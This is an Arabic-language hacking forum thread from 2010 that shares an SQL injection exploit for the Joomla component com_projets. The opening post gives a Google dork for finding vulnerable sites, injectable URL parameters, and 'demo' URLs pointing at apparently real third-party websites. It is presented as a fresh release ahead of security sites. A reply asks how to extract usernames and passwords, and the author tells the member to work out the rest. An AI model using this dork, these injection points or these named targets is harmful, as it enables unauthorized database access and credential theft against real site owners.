Joomla Component (com_projets) SQL Injection Vulnerability - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

BrOx-Dz · 30/11/2010, 13:05

بسم الله الرحمان الرحيم

اليوم نزلت ثغرة جديدة بسكريبت جوملا المشهور قبل ماتنزل بمواقع سكيوريتي

كود بلغة HTML:

==========================================================
Joomla Component (com_projets) SQL Injection Vulnerability
==========================================================

#######################################################################
# Exploit Title:Joomla Component (com_projets) SQL Injection Vulnerability #
# Author:By BrOx-Dz #
# Google Dork: inurl:com_projets #
# date:30/11/2010 #
# Tested on : xp b3 ubuntu 10 #
# mail: [] #
# home : algerie // free gaza
#######################################################################

Description for component :

This Jomponent Joomla (com_programas) And Infected Injection Sql Blind

and sql injection

=======================================================================

Exploit :

http://Site/index.php?option=com_projets&task=FicheProjet&id_projet=***91;SQL***93;
or
http://site/index.php?option=com_projets&func=viewprojet&catid=***91;SQL***93;

=======================================================================

Demo :

http://www.elfal.ma/index.php?option=com_projets&func=viewprojet&catid=13***91;SQL***93;&Itemid=13

http://www.strata.ch/index.php?option=com_projets&task=view&id=42g&type=1&Itemid=88***91;SQL***93;

=======================================================================


##############################################################
Greetz @ kader11000,Lagripe-Dz,MCA-CRB,All"MusliM"

and membre h4kz.net // dz4all.com // dzhacker.net

la ilaha ila lah
#############################################################

القادم احلى ثغرة بدهووك فورم

**ViRuS_Ra3cH** · 30/11/2010, 13:09

بارك الله فيك **** على الاهداء......

BrOx-Dz · 30/11/2010, 13:18

اقتباس:

ra3ch يقول

بارك الله فيك **** على الاهداء......

وفيك بركة اخى ra3ch

~~Gulussa~~ · 30/11/2010, 14:19

يعطيك الف عااافية اخي الغالي
ثغرة رائعة
يسلمك ربي

X_AviaTique_X · 30/11/2010, 14:22

بارك الله فيك، لكن ما فهمت الاستغلال ،
ممكن الاستغلال الكامل لجلب كل البيانات [يوزر وباس]
و**** على الاهداء ...

BrOx-Dz · 30/11/2010, 14:28

اقتباس:

md5 يقول

بارك الله فيك، لكن ما فهمت الاستغلال ،
ممكن الاستغلال الكامل لجلب كل البيانات [يوزر وباس]
و**** على الاهداء ...

وفيك بركة

انا اعطيتك 50/100 اكمل الباقى

BrOx-Dz · 30/11/2010, 14:28

اقتباس:

Gulussa يقول

يعطيك الف عااافية اخي الغالي
ثغرة رائعة
يسلمك ربي

الله يعافيك

mS_Dz · 08/05/2011, 18:50

مشكور خويا بو بكر

Cmtr-Dz · 22/05/2011, 19:18

الله يبارك فيك خيو الي الأمام

9lbi hacker · 16/06/2011, 15:55

اقتباس:

مشكور اخوي . ممكن اطلــبكم ؟
ابي دوره بـ التخميــن بلـيـز ...

إخوك .. صلبي هكر ..

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
Joomla Component com_gr SQL Injection Vulnerability	GHOS7	[ Section Française ]	2	27/10/2012 16:40
Joomla JE Job Component SQL injection Vulnerability	ViRuS_Ra3cH	[ منتدى الثغرات & أكتشافات الاعضاء ]	3	07/08/2012 23:31
[webapps / 0day] - Joomla Component (com_projets) SQL Injection Vulnerability	ADMINISTRATOR	قسم الثغرات	0	30/11/2010 16:41
Joomla Component (com_clan) SQL Injection Vulnerability	ViRuS_Ra3cH	[ منتدى الثغرات & أكتشافات الاعضاء ]	0	09/11/2010 16:29
Joomla Component com_arash SQL Injection Vulnerability	Dz_V!rUs	[ منتدى الثغرات & أكتشافات الاعضاء ]	0	06/09/2010 12:42

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)